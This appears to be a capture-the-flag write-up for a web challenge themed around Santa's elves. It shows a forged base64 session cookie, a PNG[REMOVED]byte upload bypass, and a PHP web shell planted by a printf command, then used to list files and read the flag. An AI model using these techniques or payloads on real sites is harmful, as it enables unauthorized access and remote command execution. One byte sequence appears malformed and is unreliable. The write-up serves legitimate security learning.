Can you infiltrate the Elf Directory to get a foothold inside Santa's data warehouse in the North Pole?
-
We do not have a copy of the source code for this challenge, so that makes it more challenging. We go to the website and are greeted with a login message. Let's try clicking on "Create one!", creating an account, and then signing in with that.
-
We see a profile screen with some basic details and a message that says "You don't have permission to edit your profile, contact the admin elf to approve your account!"
-
When viewing the page's HTML and looking for things that are our of place, we see the following JS code:
<script> $('#upload').change(function(){ let path = $(this).val().replace('C:\\fakepath\\', ''); $('#selectFile').html(path); }) </script>
These HTML IDs do not refer to anything on the page so something must be missing.
-
Next, we decide to check how your session remains signed in. There is a cookie called "PHPSESSID", which is common for PHP, with the value
eyJ1c2VybmFtZSI6InRlc3QiLCJhcHByb3ZlZCI6ZmFsc2V9. This is base64 and when decoded usingbase64 -dshows{"username":"test","approved":false}. -
Let's try setting
approvedtotrueand then encoding it again:echo '{"username":"test","approved":true}' | base64returnseyJ1c2VybmFtZSI6InRlc3QiLCJhcHByb3ZlZCI6dHJ1ZX0K. Swapping the cookie in the browser's developer tools and reloading the page now shows a "Update profile avatar" file selector. -
Let's try uploading a new profile picture. Only PNGs are accepted, so there is some file type validation happening. After uploading the image, the page reloads and the profile picture has indeed changed. My image was originally called
Red.png, but when it is uploaded it is renamed to073cc_Red.pngand is placed in the/uploadsdirectory. -
So, we have control over the file name, but the application checks for a valid PNG. Let's see how it's doing that file type check by uploading the same picture with the name
Red.png.php. This is successful, but trying to upload a text file that has.phpin the name fails. -
We can go through the file upload methodology discussed on HackTricks. It turns out that the application is checking if the magic bytes of a PNG image are present. So, let's create a file with those bytes and a call to
phpInfo. The magic bytes for a PNG are\x89PNG\r\n\x1a\n\0\0\0\rIHDR\0\0\x03H\0\xs0\x03[and we can callphpInfowith<?php phpInfo(); ?>. So, we runprintf "\x89PNG\r\n\x1a\n\0\0\0\rIHDR\0\0\x03H\0\xs0\x03[<?php phpInfo(); ?>" > exploit_test.png.phpto get our image/php file/exploit. Uploading this file and then right clicking on our profile file and selecting "Open Image in New Tab" displays the PHP info page. We have achieved remote code execution. -
So, lets pop a shell instead of showing the info page by running
<?php echo system($_GET['cmd']); ?>instead of<?php phpInfo(); ?>. Create the exploit file with<?php phpInfo(); ?>. So, we runprintf "\x89PNG\r\n\x1a\n\0\0\0\rIHDR\0\0\x03H\0\xs0\x03[<?php echo system(\$_GET['cmd']); ?>" > exploit.png.php -
Uploading and navigating to this image appears to work. Now we can run commands by setting the
cmdparameter to the command we want to run. So, let's try to find the flag withhttp://IP:PORT/uploads/195c2_exploit.png.php?cmd=ls%20-la%20/. This reveals a file calledflag_65890d927c37c33.txt. Let's open that file withhttp://IP:PORT/uploads/195c2_exploit.png.php?cmd=cat%20/flag_65890d927c37c33.txt. Running this prints the flag.
HTB{br4k3_au7hs_g3t_5h3lls}